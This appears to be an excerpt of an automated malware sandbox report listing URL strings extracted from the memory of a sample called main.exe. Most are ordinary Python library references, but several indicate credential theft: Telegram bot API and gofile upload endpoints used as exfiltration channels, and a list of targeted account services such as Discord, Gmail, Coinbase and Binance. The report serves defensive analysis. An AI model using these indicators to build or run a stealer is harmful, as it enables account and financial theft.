            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008768260.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014545215.000001E894834000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025023723.000001E894A33000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024403480.000001E89483A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: main.exe, 00000002.00000002.2023726848.000001E894776000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981062984.000001E894776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
            Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
            Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/mit-license.phptrols
            Source: main.exe, 00000002.00000003.1785741511.000001E89399B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
            Source: main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: main.exe, 00000002.00000003.1973010642.000001E893B75000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994855674.000001E893BCE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973747012.000001E893B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980969299.000001E893BCC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893BBE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020621648.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974563806.000001E893BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: main.exe, 00000002.00000003.1972971253.000001E894B59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995890221.000001E894B91000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001942358.000001E894B96000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994813697.000001E894B65000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B5A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000928411.000001E894B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
            Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999790969.000001E893AD7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981303330.000001E893A9B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997398066.000001E893A9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999906974.000001E893ADF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979378962.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986060081.000001E893A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
            Source: main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022722269.000001E894613000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002779411.000001E894613000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999364287.000001E894613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/servers
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botp
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://binance.com)
            Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com)
            Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/pallets
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://disney.com)
            Source: main.exe, 00000002.00000003.2008146184.000001E8936B4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981959975.000001E89369F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793761731.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981084453.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982725593.000001E8936B3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976651882.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981251684.000001E893699000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982367230.000001E8936A6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E893698000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E893698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
            Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
            Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
            Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
            Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
            Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
            Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
            Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
            Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
            Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
            Source: main.exe, 00000002.00000003.1975331009.000001E893501000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980293973.000001E893502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
            Source: main.exe, 00000002.00000003.1979666103.000001E8939E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E8939F8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982059163.000001E8939EE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987528082.000001E8939F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984054418.000001E8939EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/pprint.html
            Source: main.exe, 00000002.00000003.1980146595.000001E8939B3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979666103.000001E8939E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E8939F8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982059163.000001E8939EE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987528082.000001E8939F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977996785.000001E8939B0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978801071.000001E8939B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984054418.000001E8939EF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002704970.000001E8939B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/pprint.html#pprint.pprint
            Source: main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A01000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A04000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020045883.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012429799.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996321903.000001E893968000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/re.html
            Source: main.exe, 00000002.00000003.1793009900.000001E893AAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://epicgames.com)
            Source: main.exe, 00000002.00000003.1982648844.000001E894B39000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exiv2.orA
            Source: main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exiv2.org/tags.html)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)P
            Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
            Source: main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com)
            Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E8947F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
            Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
            Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
            Source: main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
            Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pallets/markupsafe/
            Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
            Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
            Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging02d2
            Source: main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
            Source: main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyparsing/pyparsing/wiki
            Source: main.exe, 00000002.00000002.2027115983.000001E895370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-pillow/Pillow/
            Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
            Source: main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
            Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777434520.000001E89154A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
            Source: main.exe, 00000002.00000003.1781941357.000001E8933CD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975282383.000001E893359000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977491655.000001E89338A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1781656560.000001E893672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
            Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
            Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
            Source: main.exe, 00000002.00000003.1972023696.000001E89477F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023880824.000001E894794000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985448658.000001E894790000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982748630.000001E89478F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001384242.000001E894790000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013797499.000001E894790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
            Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
            Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/32900
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmail.com)
            Source: main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976200965.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998719177.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001089205.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983459559.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 